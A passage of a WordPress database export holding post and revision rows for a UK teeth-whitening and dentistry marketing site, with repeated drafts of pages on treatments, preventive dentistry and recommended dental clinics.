kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.','Keeping a Healthy Smile','','inherit','closed','closed','','98-revision-v1','','','2018-01-30 08:24:58','2018-01-30 08:24:58','',98,'https://teethwhiteningproduct.co.uk/2018/01/30/98-revision-v1/',0,'revision','',0),(101,1,'2018-01-30 08:27:01','2018-01-30 08:27:01','<strong>We offer the highest quality dental treatments and facial aesthetics in London</strong>\r\n\r\nOur dentists are skilled and experienced doctors knowledgeable in the latest dental procedures. They Treatments offered include teeth whitening, porcelain veneers, lumineers, crowns and bridges, dental implants, Invisalign and Orthodontic.\r\n\r\nOur aim is Dental Health for you and your family.\r\n\r\nGet Beautiful Smile With Beautiful Teeth\r\n\r\nThis means giving you regular dental advice and screening and helping you to understand how to care for your own mouth.\r\n\r\nOur aim is to provide good quality dentistry using the latest technology and materials available but also to offer relaxed and friendly surroundings and minimum discomfort. The team operates a preventive approach and our goal is to make your mouth comfortable and efficient with the best aesthetic result that is practicable.\r\n\r\nWe offer a full range of Dental treatments, including general density, and other specialized treatments such as:\r\nrestorative (crown and bridges)\r\ncosmetic (including veneers & tooth whitening) we also offer preventative dentistry Orthodontic\r\n\r\n ','teeth whitening','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 08:27:01','2018-01-30 08:27:01','',5,'https://teethwhiteningproduct.co.uk/2018/01/30/5-revision-v1/',0,'revision','',0),(102,1,'2018-01-30 08:27:07','2018-01-30 08:27:07','<strong>We offer the highest quality dental treatments and facial aesthetics in London</strong>\r\n\r\nOur dentists are skilled and experienced doctors knowledgeable in the latest dental procedures. They Treatments offered include teeth whitening, porcelain veneers, lumineers, crowns and bridges, dental implants, Invisalign and Orthodontic.\r\n\r\nOur aim is Dental Health for you and your family.\r\n\r\n<strong>Get Beautiful Smile With Beautiful Teeth</strong>\r\n\r\nThis means giving you regular dental advice and screening and helping you to understand how to care for your own mouth.\r\n\r\nOur aim is to provide good quality dentistry using the latest technology and materials available but also to offer relaxed and friendly surroundings and minimum discomfort. The team operates a preventive approach and our goal is to make your mouth comfortable and efficient with the best aesthetic result that is practicable.\r\n\r\nWe offer a full range of Dental treatments, including general density, and other specialized treatments such as:\r\nrestorative (crown and bridges)\r\ncosmetic (including veneers & tooth whitening) we also offer preventative dentistry Orthodontic\r\n\r\n ','teeth whitening','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 08:27:07','2018-01-30 08:27:07','',5,'https://teethwhiteningproduct.co.uk/2018/01/30/5-revision-v1/',0,'revision','',0),(103,1,'2018-01-30 08:28:01','2018-01-30 08:28:01','<p align=\"justify\"><span style=\"font-family: Verdana; font-size: x-large;\">Preventive Dentistry</span></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana;\">We firmly believe that prevention is better than cure. We want our patients to keep their teeth for life. We can pre-book routine examinations to help us ensure patients are seen at the right time so we can carefully monitor their dental and oral health and provide the best advice to prevent problems occurring in the first place.</span></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana; font-size: x-large;\">Periodontal (Gum) Disease</span></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana; font-size: medium;\">19 out of 20 people suffer from gum disease at some point in their lives, making it the most common disease in the world.</span></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana;\">It attacks the gum tissues and the bone underneath, which hold the teeth in place. If your gums bleed it means you have gum disease. This can lead to bad breath, pain and in the long term tooth loss.</span></p>','Preventive Dentistry','','publish','open','open','','preventive-dentistry','','','2018-11-06 12:42:37','2018-11-06 12:42:37','',0,'https://teethwhiteningproduct.co.uk/?p=103',0,'post','',0),(104,1,'2018-01-30 08:27:55','2018-01-30 08:27:55','','3 colours','','inherit','open','closed','','3-colours','','','2018-01-30 08:27:55','2018-01-30 08:27:55','',103,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/3-colours.jpg',0,'attachment','image/jpeg',0),(105,1,'2018-01-30 08:28:01','2018-01-30 08:28:01','<p align=\"justify\"><span style=\"font-family: Verdana; font-size: x-large;\">Preventive Dentistry</span></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana;\">We firmly believe that prevention is better than cure. We want our patients to keep their teeth for life. We can pre-book routine examinations to help us ensure patients are seen at the right time so we can carefully monitor their dental and oral health and provide the best advice to prevent problems occurring in the first place.</span></p>\r\n<p align=\"justify\"></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana; font-size: x-large;\">Periodontal (Gum) Disease</span></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana; font-size: medium;\">19 out of 20 people suffer from gum disease at some point in their lives, making it the most common disease in the world.</span></p>\r\n<p align=\"justify\"><span style=\"font-family: Verdana;\">It attacks the gum tissues and the bone underneath, which hold the teeth in place. If your gums bleed it means you have gum disease. This can lead to bad breath, pain and in the long term tooth loss.</span></p>','Preventive Dentistry','','inherit','closed','closed','','103-revision-v1','','','2018-01-30 08:28:01','2018-01-30 08:28:01','',103,'https://teethwhiteningproduct.co.uk/2018/01/30/103-revision-v1/',0,'revision','',0),(106,1,'2018-01-30 08:28:37','2018-01-30 08:28:37','<span style=\"font-family: Verdana;\">We are equipped with an intra-oral camera which enables us to show close-up images of the patient\'s teeth and gums on a tv screen, to illustrate problem areas and cosmetic improvements. We also have digital X-ray equipment where the picture appears instantly on a computer screen and can be assessed immediately with the benefit of computer enhancement and magnification. </span>\r\n\r\n<span style=\"font-family: Verdana;\">Radiation doses are significantly lower than those required by a regular X-ray film.</span>','Latest Equipment','','publish','open','open','','latest-equipment','','','2018-11-06 12:42:24','2018-11-06 12:42:24','',0,'https://teethwhiteningproduct.co.uk/?p=106',0,'post','',0),(107,1,'2018-01-30 08:28:37','2018-01-30 08:28:37','<span style=\"font-family: Verdana;\">We are equipped with an intra-oral camera which enables us to show close-up images of the patient\'s teeth and gums on a tv screen, to illustrate problem areas and cosmetic improvements. We also have digital X-ray equipment where the picture appears instantly on a computer screen and can be assessed immediately with the benefit of computer enhancement and magnification. </span>\r\n\r\n<span style=\"font-family: Verdana;\">Radiation doses are significantly lower than those required by a regular X-ray film.</span>','Latest Equipment','','inherit','closed','closed','','106-revision-v1','','','2018-01-30 08:28:37','2018-01-30 08:28:37','',106,'https://teethwhiteningproduct.co.uk/2018/01/30/106-revision-v1/',0,'revision','',0),(108,1,'2018-01-30 08:29:07','2018-01-30 08:29:07','Our highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\nA wide range of treatments are available which include.\r\n\r\n► Cosmetic dentistry\r\n► Teeth Whitening\r\n► Orthodontic\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontic\r\n► Endodontic','home kits','','inherit','closed','closed','','7-revision-v1','','','2018-01-30 08:29:07','2018-01-30 08:29:07','',7,'https://teethwhiteningproduct.co.uk/2018/01/30/7-revision-v1/',0,'revision','',0),(109,1,'2018-01-30 08:35:12','2018-01-30 08:35:12','<h2>Recommended Supporting Dentists and medical groups</h2>\r\n<a href=\"http://qualitydent.co.uk/\">qualitydent.co.uk</a>\r\n\r\n<a href=\"http://zetadental.co.uk/\">zetadental.co.uk</a>\r\n\r\n<a href=\"http://themewsdentalstudio.co.uk/\">themewsdentalstudio.co.uk</a>\r\n\r\n<a href=\"http://aspiredentalcare.co.uk/\">aspiredentalcare.co.uk</a>\r\n\r\n<a href=\"http://smiledentalplan.co.uk/\">smiledentalplan.co.uk</a>\r\n\r\n<a href=\"http://smiledentalplans.co.uk/\">smiledentalplans.co.uk</a>\r\n\r\n<a href=\"http://idhdentalcareers.co.uk/\">idhdentalcareers.co.uk</a>\r\n\r\n<a href=\"http://idhdentalcareers.co.uk/\">idhdentalcareers.co.uk</a>\r\n\r\n<a href=\"http://ihiredental.co.uk/\">ihiredental.co.uk</a>\r\n\r\n<a href=\"http://hgdentalpractice.co.uk/\">hgdentalpractice.co.uk</a>\r\n\r\n<a href=\"http://medicalstudentblog.co.uk/\">medicalstudentblog.co.uk </a>','Links','','publish','closed','closed','','links','','','2018-01-30 08:35:12','2018-01-30 08:35:12','',0,'https://teethwhiteningproduct.co.uk/?page_id=109',0,'page','',0),(110,1,'2018-01-30 08:35:12','2018-01-30 08:35:12','<h2>Recommended Supporting Dentists and medical groups</h2>\r\n<a href=\"http://qualitydent.co.uk/\">qualitydent.co.uk</a>\r\n\r\n<a href=\"http://zetadental.co.uk/\">zetadental.co.uk</a>\r\n\r\n<a href=\"http://themewsdentalstudio.co.uk/\">themewsdentalstudio.co.uk</a>\r\n\r\n<a href=\"http://aspiredentalcare.co.uk/\">aspiredentalcare.co.uk</a>\r\n\r\n<a href=\"http://smiledentalplan.co.uk/\">smiledentalplan.co.uk</a>\r\n\r\n<a href=\"http://smiledentalplans.co.uk/\">smiledentalplans.co.uk</a>\r\n\r\n<a href=\"http://idhdentalcareers.co.uk/\">idhdentalcareers.co.uk</a>\r\n\r\n<a href=\"http://idhdentalcareers.co.uk/\">idhdentalcareers.co.uk</a>\r\n\r\n<a href=\"http://ihiredental.co.uk/\">ihiredental.co.uk</a>\r\n\r\n<a href=\"http://hgdentalpractice.co.uk/\">hgdentalpractice.co.uk</a>\r\n\r\n<a href=\"http://medicalstudentblog.co.uk/\">medicalstudentblog.co.uk </a>','Links','','inherit','closed','closed','','109-revision-v1','','','2018-01-30 08:35:12','2018-01-30 08:35:12','',109,'https://teethwhiteningproduct.co.uk/2018/01/30/109-revision-v1/',0,'revision','',0),(111,1,'2018-01-30 08:38:01','2018-01-30 08:38:01','<strong><img class=\"aligncenter wp-image-83 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/morning-sickness-Copy.jpg\" alt=\"\" width=\"1280\" height=\"720\" />We offer the highest quality dental treatments and facial aesthetics in London</strong>\r\n\r\nOur dentists are skilled and experienced doctors knowledgeable in the latest dental procedures. They Treatments offered include teeth whitening, porcelain veneers, lumineers, crowns and bridges, dental implants, Invisalign and Orthodontic.\r\n\r\nOur aim is Dental Health for you and your family.\r\n\r\n<strong>Get Beautiful Smile With Beautiful Teeth</strong>\r\n\r\nThis means giving you regular dental advice and screening and helping you to understand how to care for your own mouth.\r\n\r\nOur aim is to provide good quality dentistry using the latest technology and materials available but also to offer relaxed and friendly surroundings and minimum discomfort. The team operates a preventive approach and our goal is to make your mouth comfortable and efficient with the best aesthetic result that is practicable.\r\n\r\nWe offer a full range of Dental treatments, including general density, and other specialized treatments such as:\r\nrestorative (crown and bridges), cosmetic (including veneers & tooth whitening) we also offer preventative dentistry Orthodontic\r\n\r\n ','teeth whitening','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 08:38:01','2018-01-30 08:38:01','',5,'https://teethwhiteningproduct.co.uk/2018/01/30/5-revision-v1/',0,'revision','',0),(113,1,'2018-02-08 14:59:59','2018-02-08 14:59:59','','beauty (6)','','inherit','open','closed','','beauty-6','','','2018-02-08 14:59:59','2018-02-08 14:59:59','',0,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/02/beauty-6.png',0,'attachment','image/png',0),(115,1,'2018-03-19 13:06:46','2018-03-19 13:06:46','<strong><img class=\"aligncenter wp-image-83 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/morning-sickness-Copy.jpg\" alt=\"\" width=\"1280\" height=\"720\" />We offer the highest quality dental treatments and facial aesthetics in London</strong>\r\n\r\nOur dentists are skilled and experienced doctors knowledgeable in the latest dental procedures. They Treatments offered include teeth whitening, porcelain veneers, lumineers, crowns and bridges, dental implants, Invisalign and Orthodontic.\r\n\r\nOur aim is Dental Health for you and your family.\r\n\r\n<strong>Get Beautiful Smile With Beautiful Teeth</strong>\r\n\r\nThis means giving you regular dental advice and screening and helping you to understand how to care for your own mouth.\r\n\r\nOur aim is to provide good quality dentistry using the latest technology and materials available but also to offer relaxed and friendly surroundings and minimum discomfort. The team operates a preventive approach and our goal is to make your mouth comfortable and efficient with the best aesthetic result that is practicable.\r\n\r\nWe offer a full range of Dental treatments, including general density, and other specialized treatments such as:\r\nrestorative (crown and bridges), cosmetic (including veneers & tooth whitening) we also offer preventative dentistry Orthodontic\r\n\r\n ','Teeth Whitening','','inherit','closed','closed','','5-revision-v1','','','2018-03-19 13:06:46','2018-03-19 13:06:46','',5,'https://teethwhiteningproduct.co.uk/2018/03/19/5-revision-v1/',0,'revision','',0),(116,1,'2018-03-19 13:51:43','2018-03-19 13:51:43','<h2>London & Hertfordshire dentists offer the highest quality dental treatments and facial aesthetics</h2>\r\nYour dentist should be skilled and experienced doctors knowledgeable in the latest dental procedures.\r\n\r\nTreatments typically offered include teeth whitening, porcelain veneers, lumineers, crowns and bridges, dental implants, Invisalign and orthodontic procedures.\r\n\r\n<em><strong>Teeth Whitening Products\' aim is dental health for you and your family.</strong></em>\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us for more information</a>.</blockquote>\r\n<h2>Get a Beautiful Smile with Beautiful Teeth</h2>\r\nThis means giving you regular dental advice and screening and helping you to understand how to care for your own mouth.\r\n\r\nOur aim is to provide good quality dentistry using the latest technology and materials available, but also to offer relaxed and friendly surroundings and minimum discomfort.\r\n\r\nThe team operates a preventive approach and our goal is to make your mouth comfortable and efficient with the best aesthetic result that is practicable.\r\n\r\nYour local practice should offer a full range of dental treatments, including general density, and other specialised treatments such as:\r\n<ul>\r\n <li>Restorative (crown and bridges)</li>\r\n <li>Cosmetic (including veneers & tooth whitening)</li>\r\n <li>Preventative (orthodontic)</li>\r\n</ul>\r\n<h2><a href=\"https://www.hockerilldental.com/our-practice\" target=\"_blank\" rel=\"noopener\">Leading cosmetic dentists in Hertfordshire</a></h2>\r\nHockerill Dental is based in Bishops\' Stortford and has been operating since 1960. They provide all standard dental treatments, as well as offering cosmetic dentistry such as porcelain veneers.\r\n\r\nAs well as this, they accept NHS and private patients and offer a nervous patient treatment for those who are anxious.\r\n\r\nDon\'t worry about visiting the dentist, as the Hockerill Dental team can help you overcome this fear, whilst ensuring your oral health is at its best. Call <a href=\"tel:01279652400\">01279 652400</a> for more information.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/dentists/\">Click here to see a list of other dentists</a>.</blockquote>','Teeth Whitening','','inherit','closed','closed','','5-revision-v1','','','2018-03-19 13:51:43','2018-03-19 13:51:43','',5,'https://teethwhiteningproduct.co.uk/2018/03/19/5-revision-v1/',0,'revision','',0),(118,1,'2018-04-17 13:19:22','2018-04-17 13:19:22','<img class=\"alignnone size-full wp-image-85\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/teeth-check-Copy.jpg\" alt=\"\" width=\"872\" height=\"466\" />The dentist can help you to achieve a perfect smile but it will entail putting your hand in your pocket.\n<div id=\"synopsis\">\n<div align=\"center\">After your consultation, where we listen to your needs and concerns, we will present you with all the treatment options available and offer our advice. It is important to us that you understand every stage of your treatment and we encourage you to ask questions.</div>\n</div>\n<div align=\"center\"></div>\n<strong>We pride ourselves in providing high quality general and family dental care. Regular check-ups are key to our preventive plan to help keep your teeth and gums healthy for life.</strong>\n\n<strong>We carry out all aspects of general dentistry, including cleaning, fillings, root canal therapy, crowns, veneers, dentures and extractions. We use the best materials available and the latest techniques in a gentle and caring way to help you achieve a healthy, attractive smile.</strong>\n<blockquote>If you\'re looking for specialist periodontics we recommend Al-Fa Perio Clinic in Essex. Their team of highly skilled periodontists offer a range of treatments including laser gum dentistry and <a href=\"https://www.al-faperio.co.uk/dental-implants\" target=\"_blank\" rel=\"noopener\">titanium dental implants</a>.</blockquote>\n<div class=\"entry-content\">\n\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available. <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">See our contact page.</a>\n\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large dental bills.\n\n<strong>A wide range of treatments are available which include.</strong>\n\n► Cosmetic dentistry\n► <a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Teeth Whitening</a>\n► Orthodontic\n\n► <a href=\"https://teethwhiteningproduct.co.uk/2018/01/30/preventive-dentistry/\">Preventative dentistry</a>\n► Dental Implants\n► Crown and Bridges\n► Prosthetic\n► Periodontic\n► Endodontic\n\n</div>\n<em>We follow strict hygiene and infection control procedures to ensure the safety of our patients.</em>\n\n<strong>Got questions? <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a></strong>','What dental treatments are available?','','inherit','closed','closed','','13-autosave-v1','','','2018-04-17 13:19:22','2018-04-17 13:19:22','',13,'https://teethwhiteningproduct.co.uk/2018/04/17/13-autosave-v1/',0,'revision','',0),(119,1,'2018-04-17 13:16:38','2018-04-17 13:16:38','<h2>What dental treatments are available?</h2>\r\nThe dentist can help you to achieve a perfect smile but it will entail putting your hand in your pocket.\r\n<div id=\"synopsis\">\r\n<div align=\"center\">After your consultation, where we listen to your needs and concerns, we will present you with all the treatment options available and offer our advice. It is important to us that you understand every stage of your treatment and we encourage you to ask questions.</div>\r\n</div>\r\n<div align=\"center\"></div>\r\n<strong>We pride ourselves in providing high quality general and family dental care. Regular check-ups are key to our preventive plan to help keep your teeth and gums healthy for life.</strong>\r\n\r\n<strong>We carry out all aspects of general dentistry, including cleaning, fillings, root canal therapy, crowns, veneers, dentures and extractions. We use the best materials available and the latest techniques in a gentle and caring way to help you achieve a healthy, attractive smile.</strong>\r\n\r\nIf you\'re looking for specialist periodontics we recommend Al-Fa Perio Clinic in Essex. Their team of highly skilled periodontists offer a range of treatments including laser gum dentistry and <a href=\"https://www.al-faperio.co.uk/dental-implants\" target=\"_blank\" rel=\"noopener\">titanium dental implants</a>.\r\n<div class=\"entry-content\">\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available. <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">See our contact page.</a>\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large dental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n► Cosmetic dentistry\r\n► <a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Teeth Whitening</a>\r\n► Orthodontic\r\n\r\n► <a href=\"https://teethwhiteningproduct.co.uk/2018/01/30/preventive-dentistry/\">Preventative dentistry</a>\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontic\r\n► Endodontic\r\n\r\n</div>\r\n<em>We follow strict hygiene and infection control procedures to ensure the safety of our patients.</em>\r\n\r\n<strong>Got questions? <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a></strong>','Dentists','','inherit','closed','closed','','13-revision-v1','','','2018-04-17 13:16:38','2018-04-17 13:16:38','',13,'https://teethwhiteningproduct.co.uk/2018/04/17/13-revision-v1/',0,'revision','',0),(120,1,'2018-04-17 13:18:19','2018-04-17 13:18:19','<h2>What dental treatments are available?</h2>\r\nThe dentist can help you to achieve a perfect smile but it will entail putting your hand in your pocket.\r\n<div id=\"synopsis\">\r\n<div align=\"center\">After your consultation, where we listen to your needs and concerns, we will present you with all the treatment options available and offer our advice. It is important to us that you understand every stage of your treatment and we encourage you to ask questions.</div>\r\n</div>\r\n<div align=\"center\"></div>\r\n<strong>We pride ourselves in providing high quality general and family dental care. Regular check-ups are key to our preventive plan to help keep your teeth and gums healthy for life.</strong>\r\n\r\n<strong>We carry out all aspects of general dentistry, including cleaning, fillings, root canal therapy, crowns, veneers, dentures and extractions. We use the best materials available and the latest techniques in a gentle and caring way to help you achieve a healthy, attractive smile.</strong>\r\n<blockquote>If you\'re looking for specialist periodontics we recommend Al-Fa Perio Clinic in Essex. Their team of highly skilled periodontists offer a range of treatments including laser gum dentistry and <a href=\"https://www.al-faperio.co.uk/dental-implants\" target=\"_blank\" rel=\"noopener\">titanium dental implants</a>.</blockquote>\r\n<div class=\"entry-content\">\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available. <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">See our contact page.</a>\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large dental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n► Cosmetic dentistry\r\n► <a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Teeth Whitening</a>\r\n► Orthodontic\r\n\r\n► <a href=\"https://teethwhiteningproduct.co.uk/2018/01/30/preventive-dentistry/\">Preventative dentistry</a>\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontic\r\n► Endodontic\r\n\r\n</div>\r\n<em>We follow strict hygiene and infection control procedures to ensure the safety of our patients.</em>\r\n\r\n<strong>Got questions? <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a></strong>','What dental treatments are available?','','inherit','closed','closed','','13-revision-v1','','','2018-04-17 13:18:19','2018-04-17 13:18:19','',13,'https://teethwhiteningproduct.co.uk/2018/04/17/13-revision-v1/',0,'revision','',0),(121,1,'2018-04-17 13:19:40','2018-04-17 13:19:40','<a href=\"/\"><img class=\"alignnone wp-image-85 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/teeth-check-Copy.jpg\" alt=\"leading dentistry london essex\" width=\"872\" height=\"466\" /></a>The dentist can help you to achieve a perfect smile but it will entail putting your hand in your pocket.\r\n<div id=\"synopsis\">\r\n<div align=\"center\">After your consultation, where we listen to your needs and concerns, we will present you with all the treatment options available and offer our advice. It is important to us that you understand every stage of your treatment and we encourage you to ask questions.</div>\r\n</div>\r\n<div align=\"center\"></div>\r\n<strong>We pride ourselves in providing high quality general and family dental care. Regular check-ups are key to our preventive plan to help keep your teeth and gums healthy for life.</strong>\r\n\r\n<strong>We carry out all aspects of general dentistry, including cleaning, fillings, root canal therapy, crowns, veneers, dentures and extractions. We use the best materials available and the latest techniques in a gentle and caring way to help you achieve a healthy, attractive smile.</strong>\r\n<blockquote>If you\'re looking for specialist periodontics we recommend Al-Fa Perio Clinic in Essex. Their team of highly skilled periodontists offer a range of treatments including laser gum dentistry and <a href=\"https://www.al-faperio.co.uk/dental-implants\" target=\"_blank\" rel=\"noopener\">titanium dental implants</a>.</blockquote>\r\n<div class=\"entry-content\">\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available. <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">See our contact page.</a>\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large dental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n► Cosmetic dentistry\r\n► <a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Teeth Whitening</a>\r\n► Orthodontic\r\n\r\n► <a href=\"https://teethwhiteningproduct.co.uk/2018/01/30/preventive-dentistry/\">Preventative dentistry</a>\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontic\r\n► Endodontic\r\n\r\n</div>\r\n<em>We follow strict hygiene and infection control procedures to ensure the safety of our patients.</em>\r\n\r\n<strong>Got questions? <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a></strong>','What dental treatments are available?','','inherit','closed','closed','','13-revision-v1','','','2018-04-17 13:19:40','2018-04-17 13:19:40','',13,'https://teethwhiteningproduct.co.uk/2018/04/17/13-revision-v1/',0,'revision','',0),(122,1,'2018-04-17 13:20:11','2018-04-17 13:20:11','<a href=\"/\"><img class=\"alignnone wp-image-85 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/teeth-check-Copy.jpg\" alt=\"leading dentistry london essex\" width=\"872\" height=\"466\" /></a>The dentist can help you to achieve a perfect smile but it will entail putting your hand in your pocket.\r\n<div id=\"synopsis\">\r\n<div align=\"center\">After your consultation, where we listen to your needs and concerns, we will present you with all the treatment options available and offer our advice. It is important to us that you understand every stage of your treatment and we encourage you to ask questions.</div>\r\n</div>\r\n<div align=\"center\"></div>\r\n<strong>We pride ourselves in providing high quality general and family dental care. Regular check-ups are key to our preventive plan to help keep your teeth and gums healthy for life.</strong>\r\n\r\n<strong>We carry out all aspects of general dentistry, including cleaning, fillings, root canal therapy, crowns, veneers, dentures and extractions. We use the best materials available and the latest techniques in a gentle and caring way to help you achieve a healthy, attractive smile.</strong>\r\n<blockquote><em>If you\'re looking for specialist periodontics we recommend <strong>Al-Fa Perio Clinic in Essex</strong>. Their team of highly skilled periodontists offer a range of treatments including laser gum dentistry and <a href=\"https://www.al-faperio.co.uk/dental-implants\" target=\"_blank\" rel=\"noopener\">titanium dental implants</a>.</em></blockquote>\r\n<div class=\"entry-content\">\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available. <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">See our contact page.</a>\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large dental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n► Cosmetic dentistry\r\n► <a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Teeth Whitening</a>\r\n► Orthodontic\r\n\r\n► <a href=\"https://teethwhiteningproduct.co.uk/2018/01/30/preventive-dentistry/\">Preventative dentistry</a>\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontic\r\n► Endodontic\r\n\r\n</div>\r\n<em>We follow strict hygiene and infection control procedures to ensure the safety of our patients.</em>\r\n\r\n<strong>Got questions? <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a></strong>','What dental treatments are available?','','inherit','closed','closed','','13-revision-v1','','','2018-04-17 13:20:11','2018-04-17 13:20:11','',13,'https://teethwhiteningproduct.co.uk/2018/04/17/13-revision-v1/',0,'revision','',0),(123,1,'2018-04-17 13:20:44','2018-04-17 13:20:44','<a href=\"/\"><img class=\"alignnone wp-image-85 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/teeth-check-Copy.jpg\" alt=\"leading dentistry london essex\" width=\"872\" height=\"466\" /></a>\r\n\r\n \r\n<div id=\"synopsis\">\r\n<div align=\"center\">After your consultation, where we listen to your needs and concerns, we will present you with all the treatment options available and offer our advice. It is important to us that you understand every stage of your treatment and we encourage you to ask questions.</div>\r\n</div>\r\n<div align=\"center\"></div>\r\n<strong>We pride ourselves in providing high quality general and family dental care. Regular check-ups are key to our preventive plan to help keep your teeth and gums healthy for life.</strong>\r\n\r\n<strong>We carry out all aspects of general dentistry, including cleaning, fillings, root canal therapy, crowns, veneers, dentures and extractions. We use the best materials available and the latest techniques in a gentle and caring way to help you achieve a healthy, attractive smile.</strong>\r\n<blockquote><em>If you\'re looking for specialist periodontics we recommend <strong>Al-Fa Perio Clinic in Essex</strong>. Their team of highly skilled periodontists offer a range of treatments including laser gum dentistry and <a href=\"https://www.al-faperio.co.uk/dental-implants\" target=\"_blank\" rel=\"noopener\">titanium dental implants</a>.</em></blockquote>\r\n<div class=\"entry-content\">\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available. <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">See our contact page.</a>\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large dental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n► Cosmetic dentistry\r\n► <a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Teeth Whitening</a>\r\n► Orthodontic\r\n\r\n► <a href=\"https://teethwhiteningproduct.co.uk/2018/01/30/preventive-dentistry/\">Preventative dentistry</a>\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontic\r\n► Endodontic\r\n\r\n</div>\r\n<em>We follow strict hygiene and infection control procedures to ensure the safety of our patients.</em>\r\n\r\n<strong>Got questions? <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a></strong>','What dental treatments are available?','','inherit','closed','closed','','13-revision-v1','','','2018-04-17 13:20:44','2018-04-17 13:20:44','',13,'https://teethwhiteningproduct.co.uk/2018/04/17/13-revision-v1/',0,'revision','',0),(124,1,'2018-04-17 13:21:20','2018-04-17 13:21:20','<a href=\"/\"><img class=\"alignnone wp-image-85 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/teeth-check-Copy.jpg\" alt=\"leading dentistry london essex\" width=\"872\" height=\"466\" /></a>\r\n\r\n \r\n<h3>Find out how we can help you</h3>\r\n<div id=\"synopsis\">\r\n<div align=\"center\">After your consultation, where we listen to your needs and concerns, we will present you with all the treatment options available and offer our advice. It is important to us that you understand every stage of your treatment and we encourage you to ask questions.</div>\r\n</div>\r\n<div align=\"center\"></div>\r\n<strong>We pride ourselves in providing high quality general and family dental care. Regular check-ups are key to our preventive plan to help keep your teeth and gums healthy for life.</strong>\r\n\r\n<strong>We carry out all aspects of general dentistry, including cleaning, fillings, root canal therapy, crowns, veneers, dentures and extractions. We use the best materials available and the latest techniques in a gentle and caring way to help you achieve a healthy, attractive smile.</strong>\r\n<blockquote><em>If you\'re looking for specialist periodontics we recommend <strong>Al-Fa Perio Clinic in Essex</strong>. Their team of highly skilled periodontists offer a range of treatments including laser gum dentistry and <a href=\"https://www.al-faperio.co.uk/dental-implants\" target=\"_blank\" rel=\"noopener\">titanium dental 